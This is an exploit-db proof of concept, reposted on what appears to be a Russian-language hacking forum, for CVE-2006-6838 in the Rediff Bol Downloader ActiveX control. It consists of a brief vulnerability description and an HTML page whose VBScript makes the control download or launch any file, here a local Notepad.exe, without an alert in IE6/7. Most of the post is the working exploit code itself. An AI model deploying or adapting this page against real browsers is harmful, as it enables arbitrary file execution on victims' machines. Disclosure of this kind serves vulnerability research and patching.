Exploit Rediff Bol Downloader - ActiveX Control Execute Local File

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3058
Проверка EDB
  1. Пройдено
Автор
GREGORY R. PANAKKAL
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2006-6838
Дата публикации
2006-12-31
HTML:
<!--
Rediff Bol Downloader ActiveX Allows Downloading and Spawning Arbitary
Files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Affected Program : Rediff Bol Download ActiveX
ActiveX (OCX) Control that downloads the Rediff Bol Messenger
setup and spawns it.


Related URL : http://messenger.rediff.com/newbol/


Discovered by : Gregory R. Panakkal


Vulnerability Description :

Rediff Bol Downloader ActiveX control allows any webpage
to download and spawn file. These file can be of any type.
No filtering is done.

IE Displays an alert, if the code points to a executable file on the
internet. But execution of local files displays no alert.


Tested On :
* IE 7.0.5730.11 (WinXP SP2)
* IE 6.0.2900.2180 (WinXP SP2)
-->

<html>

<body>
<OBJECT id="rboldwn" WIDTH=445 HEIGHT=40 classid="clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03" codebase="http://imdownloads.rediff.com/newbol/Bol.CAB">
</OBJECT>

<script language="vbscript">
 rboldwn.url = "file://C:/WINNT/Notepad.exe"
 rboldwn.fontsize = 14
 rboldwn.barcolor = EE4E00
 rboldwn.start = "start"
</script>

</body>
</html>

# milw0rm.com [2006-12-31]
 
Источник
www.exploit-db.com

Похожие темы